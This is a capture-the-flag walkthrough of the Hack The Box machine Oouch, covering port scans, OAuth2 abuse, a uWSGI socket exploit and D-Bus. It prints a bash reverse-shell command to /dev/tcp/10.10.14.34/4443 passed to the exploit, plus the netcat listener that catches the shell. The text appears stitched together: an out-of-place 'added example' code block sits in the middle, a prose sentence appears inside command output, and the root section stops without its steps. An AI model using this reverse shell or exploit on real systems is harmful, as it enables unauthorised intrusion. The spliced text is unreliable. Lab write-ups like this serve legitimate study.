Oouch is one of the hard (close to Insane) boxes that will give you a lot of fun but also tons of frustration, with a big dose of new technologies and web techniques. Prepare to study, investigate and have fun.
Enum
Port scans
As with every box, the first step is to run Nmap to discover open ports and run the basic scripts against them.
```
Running script with target Oouch/10.10.10.177
[*] Creating directory Oouch structure
[*] Running NMAP all ports to 10.10.10.177
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 16:21 CEST
Initiating Ping Scan at 16:21
Scanning 10.10.10.177 [2 ports]
Completed Ping Scan at 16:21, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 16:21
Scanning 10.10.10.177 [65535 ports]
Discovered open port 22/tcp on 10.10.10.177
Discovered open port 21/tcp on 10.10.10.177
Discovered open port 8000/tcp on 10.10.10.177
Completed Connect Scan at 16:21, 12.86s elapsed (65535 total ports)
Nmap scan report for 10.10.10.177
Host is up (0.040s latency).
Not shown: 64978 closed ports, 554 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
8000/tcp open  http-alt

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.94 seconds

[*] Running NMAP scripts to open ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 16:21 CEST
WARNING: Service 10.10.10.177:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.10.177
Host is up (0.040s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp            49 Feb 11 19:34 project.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.34
|      Logged in as ftp
|      TYPE: ASCII
|      Session bandwidth limit in byte/s is 30000
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:6b:a7:2b:7a:21:9f:21:11:37:11:ed:50:4f:c6:1e (RSA)
|_  256 d2:af:55:5c:06:0b:60:db:9c:78:47:b5:ca:f4:f1:04 (ED25519)
8000/tcp open  rtsp
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, HTTPOptions:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/html
|     Vary: Authorization
|     <h1>Bad Request (400)</h1>
|   RTSPRequest:
|     RTSP/1.0 400 Bad Request
|     Content-Type: text/html
|     Vary: Authorization
|     <h1>Bad Request (400)</h1>
|   SIPOptions:
|     SIP/2.0 400 Bad Request
|     Content-Type: text/html
|     Vary: Authorization
|_    <h1>Bad Request (400)</h1>
|_http-title: Site doesn't have a title (text/html).
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.89 seconds
```
After initial enumeration I found out that Nmap with -T5 missed a port, so I built a script to enumerate ports with netcat. Here are the results with a new port (5000) discovered.
Discovered a vhost called authorization, then fuzzed it to discover other internal paths and files, first unauthenticated and then with an authenticated cookie.
Nmap showed an FTP port open with anonymous login enabled; on the FTP server there was only one file, called project.txt, with the following contents.
```sh
$ cat project.txt
Flask -> Consumer
Django -> Authorization Server
```
This gave us an idea of what the server is running and what the vhost names could be:
authorization.oouch.htb
consumer.oouch.htb
Abusing Oauth for foothold
Once I had tried some user creation, logins, authorizations, etc., I understood the behaviour and the technology behind all of this, which in this case was OAuth2. This box gave me the opportunity to study this technology with some blogs and a Udemy course.
Once we have a token and a cookie on authorization, we can get SSH information about the qtc user, as Chris mentioned in the /documentation; copy the ssh_key into a file.
The exploit needs to be fixed for Python 3 compatibility; change the sz function as follows:
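```python
import sys

# Original: on Python 3 "import bytes" fails, because bytes is a builtin
# type and not an importable module.
def sz(x):
    s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
    if sys.version_info[0] == 3: import bytes
    s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
    return s[::-1]

# Fixed: Python 3 only, no import and no Python 2 branch.
def sz(x):
    s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
    s = bytes.fromhex(s)
    return s[::-1]
```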
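The fixed `sz` returns a length as two little-endian bytes, which only holds for values up to 0xFFFF and for inputs whose `len()` is a byte count. The following is an added example, not code from the exploit or from the original post: it compares the fixed function with a stricter `struct`-based variant on constructed inputs. The names `sz_fixed`, `sz_strict`, `mismatches` and `try_encode` are assumptions made for this illustration.

```python
import struct

def sz_fixed(x):
    # The page's Python 3 version of sz(), unchanged apart from the name.
    s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
    s = bytes.fromhex(s)
    return s[::-1]

def sz_strict(x):
    # Hypothetical stricter variant: same two little-endian bytes, but text is
    # measured after encoding and anything above 0xFFFF is rejected.
    if isinstance(x, str):
        x = x.encode("utf-8")    # len(str) counts characters, not bytes
    n = x if isinstance(x, int) else len(x)
    return struct.pack("<H", n)  # raises struct.error outside 0..65535

def mismatches():
    # Every value a 16-bit field can hold should encode identically.
    return [n for n in range(0x10000) if sz_fixed(n) != sz_strict(n)]

def try_encode(fn, x):
    # Return the encoded bytes, or the name of the exception raised.
    try:
        return fn(x)
    except (ValueError, struct.error) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    print("disagreements in 0..0xFFFF:", len(mismatches()))
    # Constructed sample inputs: in range, odd hex length, three bytes, non-ASCII text.
    for sample in (0x0123, 0x10000, 0x100000, "caf\u00e9"):
        print(repr(sample), try_encode(sz_fixed, sample), try_encode(sz_strict, sample))
```

For 0x100000 the fixed function silently returns three bytes instead of two, and for non-ASCII text it under-counts the length, so a Python 3 port that passes `str` values should encode them to bytes before measuring.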
This container does not have netcat, wget or curl installed. You could use ftp or, as I did, encode the exploit as base64 on your host and decode it inside the box.
Open a netcat listener on your host or on the oouch box, and execute the exploit.
```sh
qtc@aeb4525789d8:/tmp$ python exploit.py -m unix -u uwsgi.socket -c "bash -c 'bash -i >& /dev/tcp/10.10.14.34/4443 0>&1'"
[*]Sending payload.
```
This will give us a shell as www-data on the container.
```sh
$ rlwrap nc -nvlp 4443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 10.10.10.177.
Ncat: Connection from 10.10.10.177:51688.
bash: cannot set terminal process group (4895): Inappropriate ioctl for device
bash: no job control in this shell
bash: /root/.bashrc: Permission denied
www-data@aeb4525789d8:/code$
```
Root
During previous enumeration on /code and some code review, we saw what .note.txt said about dbus.
Abusing DBUS
This is an excerpt of the vulnerable implementation found at /code/oouch/.
```sh
www-data@aeb4525789d8:/code$ cat oouch/routes.py | grep bus
import dbus
The contact page is required to abuse the Oauth vulnerabilities. This endpoint allows the user to send messages using a textfield.
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
bus.close()
```
This box was especially fun and frustrating; it made me learn OAuth and investigate D-Bus and uWSGI. It is also good practice for CSRF and SSRF techniques. Hope you enjoyed the whole process.